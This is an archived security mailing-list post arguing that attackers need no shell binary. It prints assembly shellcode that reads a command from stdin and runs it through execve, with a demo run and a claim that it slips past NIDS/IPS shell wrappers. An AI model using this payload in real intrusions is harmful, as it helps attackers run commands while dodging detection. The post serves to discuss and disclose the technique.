lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: mar_fallon at yahoo.com.br (Martin Fallon)
Subject: No shell => secure?

Hello Srs.!

We don't need a shell. One shellcode use system calls
and the shellcode can be the shell. 

See the follow code:

-------------- noshell.s --------------
#Exemplo de assembly que simula shell.
#Sem utilizar nenhuma shell, ele ? a shell.:)
#Nash Leon - nashleon@...oo.com.br
#
#Obs: tah pegando apenas filename com 7 bytes.

_start:

#read(0,buffer,20)
xorl %ebx, %ebx
movl $3, %eax
leal -20(%esp),%ecx
movl $20, %edx
int $0x80


#execve(buffer)
pushl %ecx
popl   %esi
movl   %esi,0x8(%esi) 
movb   $0x0,0x7(%esi)
movl   $0x0,0xc(%esi)  
movl   $0xb,%eax
movl   %esi,%ebx 
leal   0x8(%esi),%ecx
#leal   0xc(%esi),%edx 
movl $0x0, %edx
int    $0x80                


#exit()
movl $0x1, %eax
xorl %ebx, %ebx
int $0x80
---------------------------------------

This source use read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that is possible create
one shellcode that execute commands without
use one shell(/bin/bash,sh,zsh,tcsh, etc).

It is util when one NIDS/IPS interact with
one shell wrapper, waiting one string in the
interface, capturing an attack.

In this sample is permitted only
7 bytes as path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.s
ld: warning: cannot find entry symbol _start;
defaulting to 
0000000008048074

$ /noshell
/bin/ls
noshell  noshell.o  noshell.s

So, Mrs. One shell is not necessary to exploit
one system. NIDs/IPS can use wrapper in the system
call execve() to security, but still is possible
break this resource.

Sorry ny poor english.

Best Regard,

Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/








	
	
		
_______________________________________________________
Yahoo! Mail agora com 100MB, anti-spam e antiv?rus gr?tis!
http://br.info.mail.yahoo.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ